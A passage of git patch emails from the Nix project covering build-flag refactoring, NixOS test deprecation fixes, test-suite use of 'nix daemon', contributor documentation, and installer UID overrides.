-AC_ARG_ENABLE(internal_api_docs, AS_HELP_STRING([--enable-internal-api-docs],[Build API docs for Nix's internal unstable C++ interfaces]), - internal_api_docs=$enableval, internal_api_docs=no) -AC_SUBST(internal_api_docs) +AC_ARG_ENABLE(unit-tests, AS_HELP_STRING([--disable-unit-tests],[Do not build the tests]), + ENABLE_UNIT_TESTS=$enableval, ENABLE_UNIT_TESTS=$ENABLE_BUILD) +AC_SUBST(ENABLE_UNIT_TESTS) AS_IF( - [test "$ENABLE_BUILD" == "yes" || test "$ENABLE_TEST" == "yes"], + [test "$ENABLE_BUILD" == "no" && test "$ENABLE_UNIT_TESTS" == "yes"], + [AC_MSG_ERROR([Cannot enable unit tests when building overall is disabled. Please do not pass '--enable-unit-tests' or do not pass '--disable-build'.])]) + +AC_ARG_ENABLE(functional-tests, AS_HELP_STRING([--disable-functional-tests],[Do not build the tests]), + ENABLE_FUNCTIONAL_TESTS=$enableval, ENABLE_FUNCTIONAL_TESTS=yes) +AC_SUBST(ENABLE_FUNCTIONAL_TESTS) + +# documentation generation switch +AC_ARG_ENABLE(doc-gen, AS_HELP_STRING([--disable-doc-gen],[disable documentation generation]), + ENABLE_DOC_GEN=$enableval, ENABLE_DOC_GEN=$ENABLE_BUILD) +AC_SUBST(ENABLE_DOC_GEN) + +AS_IF( + [test "$ENABLE_BUILD" == "no" && test "$ENABLE_GENERATED_DOCS" == "yes"], + [AC_MSG_ERROR([Cannot enable generated docs when building overall is disabled. Please do not pass '--enable-doc-gen' or do not pass '--disable-build'.])]) + +# Building without API docs is the default as Nix' C++ interfaces are internal and unstable. 
+AC_ARG_ENABLE(internal-api-docs, AS_HELP_STRING([--enable-internal-api-docs],[Build API docs for Nix's internal unstable C++ interfaces]), + ENABLE_INTERNAL_API_DOCS=$enableval, ENABLE_INTERNAL_API_DOCS=no) +AC_SUBST(ENABLE_INTERNAL_API_DOCS) + +AS_IF( + [test "$ENABLE_FUNCTIONAL_TESTS" == "yes" || test "$ENABLE_DOC_GEN" == "yes"], [NEED_PROG(jq, jq)]) AS_IF([test "$ENABLE_BUILD" == "yes"],[ @@ -317,7 +335,7 @@ if test "$gc" = yes; then AC_DEFINE(HAVE_BOEHMGC, 1, [Whether to use the Boehm garbage collector.]) fi -AS_IF([test "$ENABLE_TESTS" == "yes"],[ +AS_IF([test "$ENABLE_UNIT_TESTS" == "yes"],[ # Look for gtest. PKG_CHECK_MODULES([GTEST], [gtest_main]) @@ -349,11 +367,6 @@ AC_LANG_POP(C++) # Look for nlohmann/json. PKG_CHECK_MODULES([NLOHMANN_JSON], [nlohmann_json >= 3.9]) -# documentation generation switch -AC_ARG_ENABLE(doc-gen, AS_HELP_STRING([--disable-doc-gen],[disable documentation generation]), - doc_generate=$enableval, doc_generate=yes) -AC_SUBST(doc_generate) - # Look for lowdown library. PKG_CHECK_MODULES([LOWDOWN], [lowdown >= 0.9.0], [CXXFLAGS="$LOWDOWN_CFLAGS $CXXFLAGS"]) diff --git a/doc/internal-api/local.mk b/doc/internal-api/local.mk index 890f341b7..bf2c4dede 100644 --- a/doc/internal-api/local.mk +++ b/doc/internal-api/local.mk @@ -1,19 +1,7 @@ -.PHONY: internal-api-html - -ifeq ($(internal_api_docs), yes) - $(docdir)/internal-api/html/index.html $(docdir)/internal-api/latex: $(d)/doxygen.cfg mkdir -p $(docdir)/internal-api { cat $< ; echo "OUTPUT_DIRECTORY=$(docdir)/internal-api" ; } | doxygen - # Generate the HTML API docs for Nix's unstable internal interfaces. +.PHONY: internal-api-html internal-api-html: $(docdir)/internal-api/html/index.html - -else - -# Make a nicer error message -internal-api-html: - @echo "Internal API docs are disabled. Configure with '--enable-internal-api-docs', or avoid calling 'make internal-api-html'." 
- @exit 1 - -endif diff --git a/doc/manual/local.mk b/doc/manual/local.mk index 456000d3d..b77168885 100644 --- a/doc/manual/local.mk +++ b/doc/manual/local.mk @@ -1,5 +1,3 @@ -ifeq ($(doc_generate),yes) - # The version of Nix used to generate the doc. Can also be # `$(nix_INSTALL_PATH)` or just `nix` (to grap ambient from the `PATH`), # if one prefers. @@ -180,6 +178,8 @@ manual-html: $(docdir)/manual/index.html install: $(docdir)/manual/index.html # Generate 'nix' manpages. +.PHONY: manpages +manpages: $(mandir)/man1/nix3-manpages install: $(mandir)/man1/nix3-manpages man: doc/manual/generated/man1/nix3-manpages all: doc/manual/generated/man1/nix3-manpages @@ -225,5 +225,3 @@ $(docdir)/manual/index.html: $(MANUAL_SRCS) $(d)/book.toml $(d)/anchors.jq $(d)/ @rm -rf $(DESTDIR)$(docdir)/manual @mv $(DESTDIR)$(docdir)/manual.tmp/html $(DESTDIR)$(docdir)/manual @rm -rf $(DESTDIR)$(docdir)/manual.tmp - -endif diff --git a/doc/manual/src/contributing/hacking.md b/doc/manual/src/contributing/hacking.md index 421ac981c..9478c424d 100644 --- a/doc/manual/src/contributing/hacking.md +++ b/doc/manual/src/contributing/hacking.md @@ -67,9 +67,10 @@ You can also build Nix for one of the [supported platforms](#platforms). ## Makefile variables - `ENABLE_BUILD=yes` to enable building the C++ code. -- `ENABLE_TESTS=yes` to enable building the tests. +- `ENABLE_DOC_GEN=yes` to enable building the documentation (manual, man pages, etc.). +- `ENABLE_FUNCTIONAL_TESTS=yes` to enable building the functional tests. +- `ENABLE_UNIT_TESTS=yes` to enable building the unit tests. - `OPTIMIZE=1` to enable optimizations. -- `doc_generate=yes` to enable building the documentation (manual, man pages, etc.). The docs can take a while to build, so you may want to disable this for local development. 
diff --git a/doc/manual/src/installation/prerequisites-source.md b/doc/manual/src/installation/prerequisites-source.md index d4babf1ea..807e82517 100644 --- a/doc/manual/src/installation/prerequisites-source.md +++ b/doc/manual/src/installation/prerequisites-source.md @@ -72,7 +72,7 @@ This is an optional dependency and can be disabled by providing a `--disable-cpuid` to the `configure` script. - - Unless `./configure --disable-tests` is specified, GoogleTest (GTest) and + - Unless `./configure --disable-unit-tests` is specified, GoogleTest (GTest) and RapidCheck are required, which are available at and respectively. diff --git a/mk/disable-tests.mk b/mk/disable-tests.mk deleted file mode 100644 index f72f84412..000000000 --- a/mk/disable-tests.mk +++ /dev/null @@ -1,12 +0,0 @@ -# This file is only active for `./configure --disable-tests`. -# Running `make check` or `make installcheck` would indicate a mistake in the -# caller. - -installcheck: - @echo "Tests are disabled. Configure without '--disable-tests', or avoid calling 'make installcheck'." - @exit 1 - -# This currently has little effect. -check: - @echo "Tests are disabled. Configure without '--disable-tests', or avoid calling 'make check'." - @exit 1 diff --git a/package.nix b/package.nix index 24395b484..370820c40 100644 --- a/package.nix +++ b/package.nix @@ -104,30 +104,6 @@ let inherit doBuild doCheck doInstallCheck; }; - filesets = { - baseFiles = fileset.fileFilter (f: f.name != ".gitignore") ./.; - - configureFiles = fileset.unions [ - ./.version - ./configure.ac - ./m4 - # TODO: do we really need README.md? It doesn't seem used in the build. 
- ./README.md - ]; - - topLevelBuildFiles = fileset.unions [ - ./local.mk - ./Makefile - ./Makefile.config.in - ./mk - ]; - - functionalTestFiles = fileset.unions [ - ./tests/functional - (fileset.fileFilter (f: lib.strings.hasPrefix "nix-profile" f.name) ./scripts) - ]; - }; - mkDerivation = if withCoverageChecks then @@ -151,32 +127,44 @@ mkDerivation (finalAttrs: let # to be run later, requiresthe unit tests to be built. buildUnitTests = doCheck || installUnitTests; - anySortOfTesting = buildUnitTests || doInstallCheck; - in { inherit pname version; src = let - + baseFiles = fileset.fileFilter (f: f.name != ".gitignore") ./.; in fileset.toSource { root = ./.; - fileset = fileset.intersect filesets.baseFiles (fileset.unions ([ - filesets.configureFiles - filesets.topLevelBuildFiles - ./doc/internal-api + fileset = fileset.intersect baseFiles (fileset.unions ([ + # For configure + ./.version + ./configure.ac + ./m4 + # TODO: do we really need README.md? It doesn't seem used in the build. 
+ ./README.md + # For make, regardless of what we are building + ./local.mk + ./Makefile + ./Makefile.config.in + ./mk + (fileset.fileFilter (f: lib.strings.hasPrefix "nix-profile" f.name) ./scripts) ] ++ lib.optionals doBuild [ ./boehmgc-coroutine-sp-fallback.diff ./doc ./misc ./precompiled-headers.h ./src - ./tests/unit ./COPYING ./scripts/local.mk - ] ++ lib.optionals anySortOfTesting [ - filesets.functionalTestFiles + ] ++ lib.optionals buildUnitTests [ + ./doc/manual + ] ++ lib.optionals enableInternalAPIDocs [ + ./doc/internal-api + ] ++ lib.optionals buildUnitTests [ + ./tests/unit + ] ++ lib.optionals doInstallCheck [ + ./tests/functional ])); }; @@ -277,7 +265,8 @@ in { configureFlags = [ "--sysconfdir=/etc" (lib.enableFeature doBuild "build") - (lib.enableFeature anySortOfTesting "tests") + (lib.enableFeature buildUnitTests "unit-tests") + (lib.enableFeature doInstallCheck "functional-tests") (lib.enableFeature enableInternalAPIDocs "internal-api-docs") (lib.enableFeature enableManual "doc-gen") (lib.enableFeature installUnitTests "install-unit-tests") @@ -310,10 +299,7 @@ in { ''; postInstall = lib.optionalString doBuild ( - '' - mkdir -p $doc/nix-support - echo "doc manual $doc/share/doc/nix/manual" >> $doc/nix-support/hydra-build-products - '' + lib.optionalString stdenv.hostPlatform.isStatic '' + lib.optionalString stdenv.hostPlatform.isStatic '' mkdir -p $out/nix-support echo "file binary-dist $out/bin/nix" >> $out/nix-support/hydra-build-products '' + lib.optionalString stdenv.isDarwin '' @@ -322,7 +308,10 @@ in { $out/lib/libboost_context.dylib \ $out/lib/libnixutil.dylib '' - ) + lib.optionalString enableInternalAPIDocs '' + ) + lib.optionalString enableManual '' + mkdir -p ''${!outputDoc}/nix-support + echo "doc manual ''${!outputDoc}/share/doc/nix/manual" >> ''${!outputDoc}/nix-support/hydra-build-products + '' + lib.optionalString enableInternalAPIDocs '' mkdir -p ''${!outputDoc}/nix-support echo "doc internal-api-docs 
$out/share/doc/nix/internal-api/html" >> ''${!outputDoc}/nix-support/hydra-build-products ''; From 123ef6a9967d5ca8ed4052d84128ff0e98950532 Mon Sep 17 00:00:00 2001 From: Cole Helbling Date: Mon, 18 Dec 2023 10:19:25 -0800 Subject: [PATCH 139/654] Fix warnings when running checks `nix flake check` had these warnings: trace: warning: Module argument `nodes.client.config` is deprecated. Use `nodes.client` instead. trace: warning: Module argument `nodes.client.config` is deprecated. Use `nodes.client` instead. trace: warning: The option `services.openssh.permitRootLogin' defined in `/nix/store/3m3hfpmbjdf4w39qfjami7ljhvhczay1-source/tests/nixos/nix-copy.nix' has been renamed to `services.openssh.settings.PermitRootLogin'. trace: warning: Module argument `nodes.http_dns.config` is deprecated. Use `nodes.http_dns` instead. trace: warning: Module argument `nodes.github.config` is deprecated. Use `nodes.github` instead. trace: warning: Module argument `nodes.sourcehut.config` is deprecated. Use `nodes.sourcehut` instead. 
--- tests/nixos/github-flakes.nix | 2 +- tests/nixos/nix-copy.nix | 2 +- tests/nixos/nss-preload.nix | 4 ++-- tests/nixos/remote-builds-ssh-ng.nix | 2 +- tests/nixos/remote-builds.nix | 8 ++++---- tests/nixos/sourcehut-flakes.nix | 2 +- 6 files changed, 10 insertions(+), 10 deletions(-) diff --git a/tests/nixos/github-flakes.nix b/tests/nixos/github-flakes.nix index 62ae8871b..a51689445 100644 --- a/tests/nixos/github-flakes.nix +++ b/tests/nixos/github-flakes.nix @@ -144,7 +144,7 @@ in virtualisation.memorySize = 4096; nix.settings.substituters = lib.mkForce [ ]; nix.extraOptions = "experimental-features = nix-command flakes"; - networking.hosts.${(builtins.head nodes.github.config.networking.interfaces.eth1.ipv4.addresses).address} = + networking.hosts.${(builtins.head nodes.github.networking.interfaces.eth1.ipv4.addresses).address} = [ "channels.nixos.org" "api.github.com" "github.com" ]; security.pki.certificateFiles = [ "${cert}/ca.crt" ]; }; diff --git a/tests/nixos/nix-copy.nix b/tests/nixos/nix-copy.nix index 2981cc2b8..7db5197aa 100644 --- a/tests/nixos/nix-copy.nix +++ b/tests/nixos/nix-copy.nix @@ -36,7 +36,7 @@ in { server = { config, pkgs, ... }: { services.openssh.enable = true; - services.openssh.permitRootLogin = "yes"; + services.openssh.settings.PermitRootLogin = "yes"; users.users.root.password = "foobar"; virtualisation.writableStore = true; virtualisation.additionalPaths = [ pkgB pkgC ]; diff --git a/tests/nixos/nss-preload.nix b/tests/nixos/nss-preload.nix index cef62e95b..00505d114 100644 --- a/tests/nixos/nss-preload.nix +++ b/tests/nixos/nss-preload.nix @@ -84,8 +84,8 @@ in client = { lib, nodes, pkgs, ... 
}: { networking.useDHCP = false; networking.nameservers = [ - (lib.head nodes.http_dns.config.networking.interfaces.eth1.ipv6.addresses).address - (lib.head nodes.http_dns.config.networking.interfaces.eth1.ipv4.addresses).address + (lib.head nodes.http_dns.networking.interfaces.eth1.ipv6.addresses).address + (lib.head nodes.http_dns.networking.interfaces.eth1.ipv4.addresses).address ]; networking.interfaces.eth1.ipv6.addresses = [ { address = "fd21::10"; prefixLength = 64; } diff --git a/tests/nixos/remote-builds-ssh-ng.nix b/tests/nixos/remote-builds-ssh-ng.nix index b59dde9bf..20a43803d 100644 --- a/tests/nixos/remote-builds-ssh-ng.nix +++ b/tests/nixos/remote-builds-ssh-ng.nix @@ -81,7 +81,7 @@ in client.succeed(f"ssh -o StrictHostKeyChecking=no {builder.name} 'echo hello world'") # Perform a build - out = client.succeed("nix-build ${expr nodes.client.config 1} 2> build-output") + out = client.succeed("nix-build ${expr nodes.client 1} 2> build-output") # Verify that the build was done on the builder builder.succeed(f"test -e {out.strip()}") diff --git a/tests/nixos/remote-builds.nix b/tests/nixos/remote-builds.nix index 1c96cc787..ad7f509db 100644 --- a/tests/nixos/remote-builds.nix +++ b/tests/nixos/remote-builds.nix @@ -90,22 +90,22 @@ in # Perform a build and check that it was performed on the builder. out = client.succeed( - "nix-build ${expr nodes.client.config 1} 2> build-output", + "nix-build ${expr nodes.client 1} 2> build-output", "grep -q Hello build-output" ) builder1.succeed(f"test -e {out}") # And a parallel build. - paths = client.succeed(r'nix-store -r $(nix-instantiate ${expr nodes.client.config 2})\!out $(nix-instantiate ${expr nodes.client.config 3})\!out') + paths = client.succeed(r'nix-store -r $(nix-instantiate ${expr nodes.client 2})\!out $(nix-instantiate ${expr nodes.client 3})\!out') out1, out2 = paths.split() builder1.succeed(f"test -e {out1} -o -e {out2}") builder2.succeed(f"test -e {out1} -o -e {out2}") # And a failing build. 
- client.fail("nix-build ${expr nodes.client.config 5}") + client.fail("nix-build ${expr nodes.client 5}") # Test whether the build hook automatically skips unavailable builders. builder1.block() - client.succeed("nix-build ${expr nodes.client.config 4}") + client.succeed("nix-build ${expr nodes.client 4}") ''; } diff --git a/tests/nixos/sourcehut-flakes.nix b/tests/nixos/sourcehut-flakes.nix index 6e8d884a0..04f3590e1 100644 --- a/tests/nixos/sourcehut-flakes.nix +++ b/tests/nixos/sourcehut-flakes.nix @@ -108,7 +108,7 @@ in flake-registry = https://git.sr.ht/~NixOS/flake-registry/blob/master/flake-registry.json ''; environment.systemPackages = [ pkgs.jq ]; - networking.hosts.${(builtins.head nodes.sourcehut.config.networking.interfaces.eth1.ipv4.addresses).address} = + networking.hosts.${(builtins.head nodes.sourcehut.networking.interfaces.eth1.ipv4.addresses).address} = [ "git.sr.ht" ]; security.pki.certificateFiles = [ "${cert}/ca.crt" ]; }; From 1f7b62f123fde15b89746b6b1f73c40a8e927499 Mon Sep 17 00:00:00 2001 From: Cole Helbling Date: Mon, 18 Dec 2023 10:36:18 -0800 Subject: [PATCH 140/654] Use `nix daemon` in the test suite As part of the CLI stabilization effort, the last remaining checkbox (at the moment) for `nix daemon` is that it "needs testing". This implements the proposal of using `nix daemon` in place of `nix-daemon` in the test suite. 
--- tests/functional/build-remote-trustless-should-pass-1.sh | 2 +- tests/functional/common/vars-and-functions.sh.in | 4 ++-- tests/functional/nix-daemon-untrusting.sh | 2 +- tests/functional/store-info.sh | 2 +- 4 files changed, 5 insertions(+), 5 deletions(-) diff --git a/tests/functional/build-remote-trustless-should-pass-1.sh b/tests/functional/build-remote-trustless-should-pass-1.sh index 516bdf092..736e280e4 100644 --- a/tests/functional/build-remote-trustless-should-pass-1.sh +++ b/tests/functional/build-remote-trustless-should-pass-1.sh @@ -2,7 +2,7 @@ source common.sh # Remote trusts us file=build-hook.nix -prog=nix-daemon +prog='nix%20daemon' proto=ssh-ng source build-remote-trustless.sh diff --git a/tests/functional/common/vars-and-functions.sh.in b/tests/functional/common/vars-and-functions.sh.in index 848988af9..c25366481 100644 --- a/tests/functional/common/vars-and-functions.sh.in +++ b/tests/functional/common/vars-and-functions.sh.in @@ -95,7 +95,7 @@ startDaemon() { fi # Start the daemon, wait for the socket to appear. rm -f $NIX_DAEMON_SOCKET_PATH - PATH=$DAEMON_PATH nix-daemon & + PATH=$DAEMON_PATH nix --extra-experimental-features 'nix-command' daemon & _NIX_TEST_DAEMON_PID=$! 
export _NIX_TEST_DAEMON_PID for ((i = 0; i < 300; i++)); do @@ -148,7 +148,7 @@ fi isDaemonNewer () { [[ -n "${NIX_DAEMON_PACKAGE:-}" ]] || return 0 local requiredVersion="$1" - local daemonVersion=$($NIX_DAEMON_PACKAGE/bin/nix-daemon --version | cut -d' ' -f3) + local daemonVersion=$($NIX_DAEMON_PACKAGE/bin/nix daemon --version | cut -d' ' -f3) [[ $(nix eval --expr "builtins.compareVersions ''$daemonVersion'' ''$requiredVersion''") -ge 0 ]] } diff --git a/tests/functional/nix-daemon-untrusting.sh b/tests/functional/nix-daemon-untrusting.sh index bcdb70989..c339b5833 100755 --- a/tests/functional/nix-daemon-untrusting.sh +++ b/tests/functional/nix-daemon-untrusting.sh @@ -1,3 +1,3 @@ #!/bin/sh -exec nix-daemon --force-untrusted "$@" +exec nix daemon --force-untrusted "$@" diff --git a/tests/functional/store-info.sh b/tests/functional/store-info.sh index c002e50be..18a8131a9 100644 --- a/tests/functional/store-info.sh +++ b/tests/functional/store-info.sh @@ -6,7 +6,7 @@ STORE_INFO_JSON=$(nix store info --json) echo "$STORE_INFO" | grep "Store URL: ${NIX_REMOTE}" if [[ -v NIX_DAEMON_PACKAGE ]] && isDaemonNewer "2.7.0pre20220126"; then - DAEMON_VERSION=$($NIX_DAEMON_PACKAGE/bin/nix-daemon --version | cut -d' ' -f3) + DAEMON_VERSION=$($NIX_DAEMON_PACKAGE/bin/nix daemon --version | cut -d' ' -f3) echo "$STORE_INFO" | grep "Version: $DAEMON_VERSION" [[ "$(echo "$STORE_INFO_JSON" | jq -r ".version")" == "$DAEMON_VERSION" ]] fi From ba0087316acc2aba999cabe5e1a159da636b2569 Mon Sep 17 00:00:00 2001 From: Cole Helbling Date: Mon, 18 Dec 2023 12:59:58 -0800 Subject: [PATCH 141/654] package: don't set sysconfdir in devShells --- flake.nix | 2 +- package.nix | 6 +++++- 2 files changed, 6 insertions(+), 2 deletions(-) diff --git a/flake.nix b/flake.nix index 8c4436729..a8fc105e8 100644 --- a/flake.nix +++ b/flake.nix @@ -395,7 +395,7 @@ stdenvs))); devShells = let - makeShell = pkgs: stdenv: (pkgs.nix.override { inherit stdenv; }).overrideAttrs (attrs: { + makeShell = pkgs: 
stdenv: (pkgs.nix.override { inherit stdenv; forDevShell = true; }).overrideAttrs (attrs: { installFlags = "sysconfdir=$(out)/etc"; shellHook = '' PATH=$prefix/bin:$PATH diff --git a/package.nix b/package.nix index 370820c40..b5ff45083 100644 --- a/package.nix +++ b/package.nix @@ -87,6 +87,9 @@ , test-daemon ? null , test-client ? null +# Avoid setting things that would interfere with a functioning devShell +, forDevShell ? false + # Not a real argument, just the only way to approximate let-binding some # stuff for argument defaults. , __forDefaults ? { @@ -263,13 +266,14 @@ in { ); configureFlags = [ - "--sysconfdir=/etc" (lib.enableFeature doBuild "build") (lib.enableFeature buildUnitTests "unit-tests") (lib.enableFeature doInstallCheck "functional-tests") (lib.enableFeature enableInternalAPIDocs "internal-api-docs") (lib.enableFeature enableManual "doc-gen") (lib.enableFeature installUnitTests "install-unit-tests") + ] ++ lib.optionals (!forDevShell) [ + "--sysconfdir=/etc" ] ++ lib.optionals installUnitTests [ "--with-check-bin-dir=${builtins.placeholder "check"}/bin" "--with-check-lib-dir=${builtins.placeholder "check"}/lib" From 6f4930382bb61f0a9b2a9e5b0080977a4dd03866 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Mon, 18 Dec 2023 13:34:08 -0800 Subject: [PATCH 142/654] Document more `Makefile` variables --- doc/manual/src/contributing/hacking.md | 15 +++++++++++++-- 1 file changed, 13 insertions(+), 2 deletions(-) diff --git a/doc/manual/src/contributing/hacking.md b/doc/manual/src/contributing/hacking.md index 9478c424d..dce0422dc 100644 --- a/doc/manual/src/contributing/hacking.md +++ b/doc/manual/src/contributing/hacking.md @@ -66,13 +66,24 @@ You can also build Nix for one of the [supported platforms](#platforms). ## Makefile variables +You may need `profiledir=$out/etc/profile.d` and `sysconfdir=$out/etc` to run +`make install`. 
+ +You may want to set `MAKEFLAGS="-e -j $NIX_BUILD_CORES"` to allow environment +variables to override `Makefile` variables. + - `ENABLE_BUILD=yes` to enable building the C++ code. - `ENABLE_DOC_GEN=yes` to enable building the documentation (manual, man pages, etc.). + + The docs can take a while to build, so you may want to disable this for local development. - `ENABLE_FUNCTIONAL_TESTS=yes` to enable building the functional tests. - `ENABLE_UNIT_TESTS=yes` to enable building the unit tests. - `OPTIMIZE=1` to enable optimizations. - - The docs can take a while to build, so you may want to disable this for local development. +- `libraries=libutil programs=` to only build a specific library (this will + fail in the linking phase if you don't have the other libraries built, but is + useful for checking types). +- `libraries= programs=nix` to only build a specific program (this will not, in + general, work, because the programs need the libraries). ## Building Nix From 0cee56db1ace13a1f4b856c800950b2fb04df993 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Mon, 18 Dec 2023 14:04:25 -0800 Subject: [PATCH 143/654] Fix `logging.sh` test on macOS MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit On macOS in the `nix develop` shell, `make tests/functional/logging.sh.test` errors: ++(logging.sh:18) mktemp +(logging.sh:18) builder=/var/folders/z5/fclwwdms3r1gq4k4p3pkvvc00000gn/T/tmp.StuabKUhMh +(logging.sh:19) echo -e '#!/bin/sh\nmkdir $out' +++(logging.sh:22) mktemp -d ++(logging.sh:22) nix-build -E 'with import ./config.nix; mkDerivation { name = "fnord"; builder = /var/folders/z5/fclwwdms3r1gq4k4p3pkvvc00000gn/T/tmp.StuabKUhMh; }' --out-link /var/folders/z5/fclwwdms3r1gq4k4p3pkvvc00000gn/T/tmp.oaKcy0NXqC/result error: … while calling the 'derivationStrict' builtin at :9:12: 8| 9| strict = derivationStrict drvAttrs; | ^ 10| … while evaluating derivation 'fnord' whose name attribute is located at «string»:1:42 … while evaluating 
attribute 'args' of derivation 'fnord' at /Users/wiggles/nix/tests/functional/config.nix:23:7: 22| builder = shell; 23| args = ["-e" args.builder or (builtins.toFile "builder-${args.name}.sh" '' | ^ 24| if [ -e "$NIX_ATTRS_SH_FILE" ]; then source $NIX_ATTRS_SH_FILE; fi; error: path '/var' is a symlink +(logging.sh:22) outp= ++(logging.sh:22) onError ++(/Users/wiggles/nix/tests/functional/common/vars-and-functions.sh:237) set +x logging.sh: test failed at: main in logging.sh:22 This is because `mktemp` returns a path like `/var/folders/z5/fclwwdms3r1gq4k4p3pkvvc00000gn/T/tmp.qDY24l6bIM`, where `/var` is a symlink to `/private/var`. Then, we attempt to use that path as a `builder`, which errors because symlinks are impure or whatever. Anyways, we can fix this by using `realpath "$(mktemp)"` instead of `mktemp` directly. NB: This error doesn't seem to happen when I run the tests through `nix flake check`. I'm not sure if Nix does something to `TMP` in that case. --- tests/functional/logging.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tests/functional/logging.sh b/tests/functional/logging.sh index 1481b9b36..1ccc21d0b 100644 --- a/tests/functional/logging.sh +++ b/tests/functional/logging.sh @@ -15,7 +15,7 @@ nix-build dependencies.nix --no-out-link --compress-build-log [ "$(nix-store -l $path)" = FOO ] # test whether empty logs work fine with `nix log`. -builder="$(mktemp)" +builder="$(realpath "$(mktemp)")" echo -e "#!/bin/sh\nmkdir \$out" > "$builder" outp="$(nix-build -E \ 'with import ./config.nix; mkDerivation { name = "fnord"; builder = '"$builder"'; }' \ From 23fb19cb18709ed097274d427a1024ae08789ed3 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 18 Dec 2023 22:36:31 +0000 Subject: [PATCH 144/654] build(deps): bump zeebe-io/backport-action from 2.2.0 to 2.3.0 Bumps [zeebe-io/backport-action](https://github.com/zeebe-io/backport-action) from 2.2.0 to 2.3.0. 
- [Release notes](https://github.com/zeebe-io/backport-action/releases) - [Commits](https://github.com/zeebe-io/backport-action/compare/v2.2.0...v2.3.0) --- updated-dependencies: - dependency-name: zeebe-io/backport-action dependency-type: direct:production update-type: version-update:semver-minor ... Signed-off-by: dependabot[bot] --- .github/workflows/backport.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/backport.yml b/.github/workflows/backport.yml index 85ddcfad3..f003114ba 100644 --- a/.github/workflows/backport.yml +++ b/.github/workflows/backport.yml @@ -21,7 +21,7 @@ jobs: fetch-depth: 0 - name: Create backport PRs # should be kept in sync with `version` - uses: zeebe-io/backport-action@v2.2.0 + uses: zeebe-io/backport-action@v2.3.0 with: # Config README: https://github.com/zeebe-io/backport-action#backport-action github_token: ${{ secrets.GITHUB_TOKEN }} From fa4bbe53e837a138c382468601cd769736f7d1dc Mon Sep 17 00:00:00 2001 From: Mel Zuser Date: Mon, 18 Dec 2023 15:02:26 -0800 Subject: [PATCH 145/654] installer: allow overriding of NIX_FIRST_BUILD_ID on darwin because there are often already users in the 300 range and it's painful to work around. revives #6466 --- scripts/install-darwin-multi-user.sh | 6 ++++-- scripts/install-multi-user.sh | 19 +++++++++++++++---- scripts/install-systemd-multi-user.sh | 4 ++++ 3 files changed, 23 insertions(+), 6 deletions(-) diff --git a/scripts/install-darwin-multi-user.sh b/scripts/install-darwin-multi-user.sh index 0326d3415..766f81bde 100644 --- a/scripts/install-darwin-multi-user.sh +++ b/scripts/install-darwin-multi-user.sh @@ -3,11 +3,13 @@ set -eu set -o pipefail +# System specific settings +export NIX_FIRST_BUILD_UID="${NIX_FIRST_BUILD_UID:-301}" +export NIX_BUILD_USER_NAME_TEMPLATE="_nixbld%d" + readonly NIX_DAEMON_DEST=/Library/LaunchDaemons/org.nixos.nix-daemon.plist # create by default; set 0 to DIY, use a symlink, etc. 
readonly NIX_VOLUME_CREATE=${NIX_VOLUME_CREATE:-1} # now default -NIX_FIRST_BUILD_UID="301" -NIX_BUILD_USER_NAME_TEMPLATE="_nixbld%d" # caution: may update times on / if not run as normal non-root user read_only_root() { diff --git a/scripts/install-multi-user.sh b/scripts/install-multi-user.sh index a08f62333..ad3ee8881 100644 --- a/scripts/install-multi-user.sh +++ b/scripts/install-multi-user.sh @@ -25,9 +25,9 @@ readonly RED='\033[31m' readonly NIX_USER_COUNT=${NIX_USER_COUNT:-32} readonly NIX_BUILD_GROUP_ID="${NIX_BUILD_GROUP_ID:-30000}" readonly NIX_BUILD_GROUP_NAME="nixbld" -# darwin installer needs to override these -NIX_FIRST_BUILD_UID="${NIX_FIRST_BUILD_UID:-30001}" -NIX_BUILD_USER_NAME_TEMPLATE="nixbld%d" +# each system specific installer must set these: +# NIX_FIRST_BUILD_UID +# NIX_BUILD_USER_NAME_TEMPLATE # Please don't change this. We don't support it, because the # default shell profile that comes with Nix doesn't support it. readonly NIX_ROOT="/nix" @@ -707,6 +707,12 @@ EOF fi } +check_required_system_specific_settings() { + if [ -z "${NIX_FIRST_BUILD_UID+x}" ] || [ -z "${NIX_BUILD_USER_NAME_TEMPLATE+x}" ]; then + failure "Internal error: System specific installer for $(uname) ($1) does not export required settings." + fi +} + welcome_to_nix() { local -r NIX_UID_RANGES="${NIX_FIRST_BUILD_UID}..$((NIX_FIRST_BUILD_UID + NIX_USER_COUNT - 1))" local -r RANGE_TEXT=$(echo -ne "${BLUE}(uids [${NIX_UID_RANGES}])${ESC}") @@ -726,7 +732,9 @@ manager. This will happen in a few stages: if you are ready to continue. 3. Create the system users ${RANGE_TEXT} and groups ${GROUP_TEXT} - that the Nix daemon uses to run builds. + that the Nix daemon uses to run builds. To create system users + in a different range, exit and run this tool again with + NIX_FIRST_BUILD_UID set. 4. Perform the basic installation of the Nix files daemon. @@ -968,13 +976,16 @@ main() { if is_os_darwin; then # shellcheck source=./install-darwin-multi-user.sh . 
"$EXTRACTED_NIX_PATH/install-darwin-multi-user.sh" + check_required_system_specific_settings "install-darwin-multi-user.sh" elif is_os_linux; then # shellcheck source=./install-systemd-multi-user.sh . "$EXTRACTED_NIX_PATH/install-systemd-multi-user.sh" # most of this works on non-systemd distros also + check_required_system_specific_settings "install-systemd-multi-user.sh" else failure "Sorry, I don't know what to do on $(uname)" fi + welcome_to_nix if ! is_root; then diff --git a/scripts/install-systemd-multi-user.sh b/scripts/install-systemd-multi-user.sh index 07b34033a..202a9bb54 100755 --- a/scripts/install-systemd-multi-user.sh +++ b/scripts/install-systemd-multi-user.sh @@ -3,6 +3,10 @@ set -eu set -o pipefail +# System specific settings +export NIX_FIRST_BUILD_UID="${NIX_FIRST_BUILD_UID:-30001}" +export NIX_BUILD_USER_NAME_TEMPLATE="nixbld%d" + readonly SERVICE_SRC=/lib/systemd/system/nix-daemon.service readonly SERVICE_DEST=/etc/systemd/system/nix-daemon.service From 7526b7ded6d5884cefcd4c71e0a33962d883ae78 Mon Sep 17 00:00:00 2001 From: Andrew Marshall Date: Mon, 18 Dec 2023 19:33:20 -0500 Subject: [PATCH 146/654] Allow access to /dev/stderr in Darwin sandbox We allow 